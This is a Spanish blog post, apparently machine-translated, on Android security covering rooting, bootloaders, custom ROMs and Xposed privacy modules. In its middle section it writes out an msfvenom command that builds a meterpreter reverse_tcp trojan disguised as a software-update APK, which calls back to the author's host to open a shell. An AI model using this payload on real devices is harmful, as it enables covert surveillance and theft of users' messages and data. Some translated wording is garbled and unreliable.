Fuente de la imagen: pixabay.com

Introducción a Android

En este tema, aprenderemos sobre Android y Open Source Security (OS). Android es una plataforma de código abierto. Es muy parecido a Linux, pero aún es muy diferente de Linux. Linux está demasiado maduro en comparación con Android. Entonces, este es Chetan Nayak, y bienvenidos a mi próximo blog sobre Open Source Web Security. He escrito este blog asumiendo que la mayoría de nosotros estaríamos usando Android K, es decir, Kitkat o Android L, es decir, Lollipop.

La razón de ser Gingerbread y Jellybean tenía muchos problemas de seguridad de código abierto que no puedo discutir en este único blog. Entonces, tal vez lo discutiré la próxima vez cuando profundice en las versiones anteriores de Android. Entonces, a partir de ahora, sigamos con KitKat y Lollipop.

Android fue diseñado con los desarrolladores en mente. Los controles de seguridad fueron diseñados para reducir la carga sobre los desarrolladores. Los desarrolladores expertos en seguridad pueden trabajar y confiar fácilmente en controles de seguridad flexibles. Los desarrolladores menos familiarizados con la seguridad estarán protegidos por valores predeterminados seguros.

El principio

No estaba muy interesado en Android hasta el último trimestre de 2013 cuando tuve mi primer teléfono celular Android, que era Sony Xperia L (basado en 4.2.2 a partir de entonces). Diablos, incluso odié a Android porque la razón era extremadamente lenta, especialmente los dispositivos Samsung. Incluso consideré comprar un Windows Lumia en ese entonces, pero afortunadamente, solía jugar muchos juegos, y tuve que comprar Xperia L ya que esta celda era Lag Proof. Tenía aproximadamente 1 concierto de RAM y Adreno 305. Lo suficientemente genial como para ejecutar cualquier cosa.

Después de jugar muchos juegos como NOVA3 y ModernCombat4, me aburrí de esa celda en un mes. Sabía que Android estaba basado en Linux, y quería hacer algunas de mis modificaciones al respecto. Comencé a leer sobre personalizaciones y aprendí sobre lo que se llamó 'Rooting'. Como tenía un buen revés en Linux, el enraizamiento no fue un problema para mí. Con un poco de ayuda de XDA, pude rootear con éxito mi celular.

Pero entonces algo me golpeó. Tan pronto como mi celda se reinició después del enraizamiento, comenzó a iniciarse en bucle (atascado en la pantalla de inicio para siempre). Ni siquiera sabía qué era el gestor de arranque en Android. Entonces, no había nada que pudiera hacer. Fue solo un mes de mi compra de mi nueva celda y mi celda ahora tenía ladrillos blandos. Siempre leí que el enraizamiento es peligroso, pero no sabía que bloquearía mi celular. Pero estaba equivocado. Mientras seguía leyendo una y todas las otras cosas sobre el enraizamiento, llegué a saber que el enrutamiento no bloquea su teléfono.

El enraizamiento es similar al acceso de administrador en una computadora (en realidad es un acceso al sistema, pero escribí acceso de administrador, por lo que es fácil de entender para los novatos). Esto significa que el enraizamiento nunca bloqueará su teléfono. Fue el gestor de arranque que bloqueó mi teléfono. Para las personas que no conocen el gestor de arranque es; El gestor de arranque es similar al BIOS en Windows. (Si no sabes qué es BIOS, entonces ni siquiera deberías leer pensando en seguridad). Bootloader o Hboot (eso es lo que se llama en Android) es lo primero que se ejecuta cuando arrancas tu Android dispositivo.

Empaqueta las instrucciones para arrancar el núcleo del sistema operativo y la mayoría de ellas están diseñadas específicamente para ejecutar su propio entorno de depuración o modificación.

El punto de control de seguridad de Android

Piense en el gestor de arranque como el punto de control de seguridad de su dispositivo. Si rompe este punto de control, perderá todo lo que tiene en su teléfono. Por lo tanto, es una buena característica de seguridad, digo. Porque si pierde su teléfono y alguien intenta obtener acceso de root para omitir el bloqueo (suponiendo que haya bloqueado su dispositivo con un pin o contraseña), entonces tendrá que desbloquear obligatoriamente el gestor de arranque, lo que provocará el borrado de sus datos por teléfono

Por lo tanto, no tiene que preocuparse de que alguien lo use mal. Entonces, similar es el caso con ROMS personalizadas. Las ROM son sistemas operativos basados ​​en versiones de Android diseñadas específicamente para su arquitectura de hardware. Entonces, si verifica XDA, para su teléfono, tendrá un número n de ROM personalizadas para sus teléfonos, algunas de las más famosas son las ROM de Cyanogen Mod, que ya están enraizadas y vienen con un conjunto predefinido de personalizaciones .

La anulación de la seguridad de Android

Puede estar pensando a partir de ahora, que tiene un teléfono celular seguro. Pero estoy aquí para demostrar que te equivocas de nuevo y ese es el objetivo de este blog. Para el segundo trimestre de 2014, la gente ya había comenzado a desarrollar exploits y rootkits para Android, que podrían rootear sus teléfonos celulares sin siquiera desbloquear los cargadores de arranque.

¿No es lo suficientemente aterrador? Déjame decirte la parte más peligrosa. Incluso podrían instalar troyanos dentro de eso. Por lo tanto, incluso si los policías pueden rastrear el celular e incluso recuperar su celular, todavía existe un alto riesgo de que puedan ver todo lo que hace en su teléfono. Esto es algo que he intentado como experimento en un entorno práctico real.

Usé Metasploit para este ataque. Lo que hice fue crear un troyano y lo instalé en el teléfono objetivo. Era un archivo apk simple, y lo llamé Actualización de software. Entonces, si el usuario es solo un hombre común con solo un bit y un byte de información sobre Seguridad, entonces ni siquiera se atreverá a eliminarlo. Y me aseguré de que cada vez que se active Internet, el malware que creé se ejecute automáticamente y se conecte de nuevo a mi puerto remoto en la máquina host.

Se utilizaron los siguientes comandos para el ataque (Metasploit es un software de prueba de penetración que ayuda a verificar vulnerabilidades en una plataforma o dispositivos específicos).

Mi dirección IP de host: 192.168.xx.xx

Mi puerto host (para volver a conectar): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Entonces, aquí creé un canal TCP inverso en mi computadora. Por lo tanto, cada vez que Internet se inicie en Android, se abrirá un shell en mi máquina Kali o en la máquina donde instalé Metasploit.

Entonces, ahora sabe lo aterrador que es para una persona que ni siquiera conoce, tiene registros de cada transacción que realiza a través de su Celular, cualquier otro contacto, mensajes de WhatsApp, SMS, Viber, registro de llamadas de Skype y todo. Si eso no da miedo, entonces no sé qué es.

Cursos recomendados

  • Curso de certificación en depuración de Ruby
  • Curso completo de PHP MySQL
  • Curso de certificación en línea en programación VB.NET
  • Curso en línea sobre la Fundación ITIL

La cobertura

Suficiente sobre cuestiones de seguridad. Todos sabemos que cualquier otra plataforma tiene problemas de seguridad. ¿Cómo podríamos estar seguros entonces? Esto no es exactamente cierto. Las plataformas se pueden asegurar hasta un punto específico, pero después de eso, depende de nosotros asegurarnos de que siga siendo así. Hay una cita infame en el mundo de la seguridad:

"Ingeniería social: porque no hay parche para la estupidez humana"

Escuché esta frase hace mucho tiempo cuando estaba viendo una Conferencia de DefCon.

Cuando no hay vulnerabilidad técnica para explotar, debes intentar hackear humanos. Y, con eso, no me refiero al hipnotismo y esas cosas. Me refiero a la Ingeniería Social. Puede leer mi otro blog "Importancia de la seguridad cibernética en nuestra vida cotidiana" para obtener más información al respecto.

Función de seguridad central de Android

Además, la ingeniería social, que es algo de lo que solo puedes ocuparte si eres inteligente; Hay maneras de cómo puede desarrollar aplicaciones de Android de una manera segura para asegurarse de que siga siendo así.

Estas son algunas de las características principales de seguridad que lo ayudan a crear aplicaciones seguras:

  • El Sandbox de aplicaciones de Android, que aísla los datos de la aplicación y la ejecución del código de otras aplicaciones.
  • Un marco de aplicación con implementaciones robustas de funcionalidad de seguridad común, como criptografía, permisos e IPC seguro.
  • Un sistema de archivos cifrados que se puede habilitar para proteger los datos en dispositivos perdidos o robados.
  • Permisos otorgados por el usuario para restringir el acceso a las funciones del sistema y los datos del usuario.
  • Permisos definidos por la aplicación para controlar los datos de la aplicación por aplicación.

¿Qué puede hacer si desea un entorno seguro pero no es desarrollador?

A partir de Android 5, es decir, Lollipop, proporciona una función donde el usuario puede agregar múltiples perfiles y modos restringidos para usar teléfonos y tabletas. Además, si ha rooteado su teléfono, hay aplicaciones de Android en módulos Xposed como AppOps, Xprivacy o Privacy Guard que pueden ayudarlo a cuidar de casi todo. Necesita instalar Xposed Framework para eso.

Xposed Framework es lo que permite que los módulos Xposed funcionen. Los módulos Xposed le permiten cambiar el comportamiento de los archivos Apk y los archivos del sistema sin la necesidad de instalar una ROM diferente. También es fácil deshacer los cambios, por lo que hay poco riesgo aquí y ni siquiera lleva mucho tiempo ya que no hay necesidad de flashear múltiples ROMS, núcleos y sus correcciones de errores.

Xprivacy, Privacy Guard y AppOps son módulos expuestos que le permiten proteger su Android al elegir qué aplicación debe tener acceso a lo que es Internet, teclado, tarjeta sd, acceso a la raíz y muchas otras cosas. Incluso puede deshabilitar el acceso solo a servicios específicos y crear plantillas definidas por el usuario para eso. En cuanto a mí, prefiero elegir Xprivacy. Pero aquí hay alguna información o diferencias si pides diferencias para elegir entre las tres anteriores.

AppOps:

Esto fue introducido originalmente por Google en Android 4.3. (Esta es la razón principal por la que no lo apoyo. No confío en Google. Llámalo Paranoia, pero Google rastrea todo lo que haces. Y no necesito que alguien haga un seguimiento de todo lo que hago, pero si confías en Google, ve a por ello.). La principal limitación de AppOps es que Google solo le permite bloquear el acceso a las aplicaciones que desea que bloquee.

Eso significa que si desea bloquear aplicaciones relacionadas con Google, como Play Services (que en realidad consume más del 50% de su memoria, batería y datos (Internet) normales) no podrá hacerlo. Esta es una razón más para que odie a Google. Entonces, creo que AppOps no es más que un malware para mí. (pero eso es solo yo pensando de esa manera, no es si confías sinceramente en Google)

Guardia privado:

Privacy Guard es una interfaz fácil de usar hecha en reemplazo de AppOps por Cyanogen Mod. Si es un principiante, le sugiero que use esto, ya que solo tiene un botón de encendido y apagado y plantillas autodefinidas sobre qué tipo de aplicación debería tener acceso a qué. Esto no es tan seguro si hay un malware que actúa o se hace pasar por una aplicación del sistema. Pero es bueno comenzar.

Xprivacidad:

Xprivacy es una herramienta todo en uno. Pero está dirigido a expertos. Puedes compararlo con una navaja suiza. Tiene todo y puede hacer que su teléfono sea seguro de cualquier otra manera, pero si no sabe lo que está haciendo, solo arruinará su teléfono y detendrá las aplicaciones incluso desde el inicio. También puede restringir el acceso a las aplicaciones del sistema. Este es lo que personalmente prefiero elegir.

Además de los módulos anteriores, incluso hay otros módulos como Lightening Firewall o BootManager en Xposed, que pueden ayudar a restringir el acceso a Internet para aplicaciones específicas y evitar que las aplicaciones se inicien junto con el sistema al reiniciar un teléfono.

Entonces, eso sería todo para este blog. En caso de problemas de seguridad, seguramente puede visitar o ser miembro del sitio web de XDA, que puede brindarle mucha más información sobre privacidad.

Artículos recomendados:-

Esta ha sido una guía para Android. Aquí discutimos el concepto básico, los puntos de control de seguridad y la función de seguridad central de Android. También puede consultar nuestros otros artículos sugeridos para obtener más información:

  1. Preguntas de la entrevista de Android: las 10 preguntas más útiles
  2. 8 alternativas útiles de Siri para Android
  3. 28 mejores consejos y trucos para herramientas de desarrollo de aplicaciones de Android
  4. Carreras en el desarrollo de Android

Categoría:

Desarrollo de software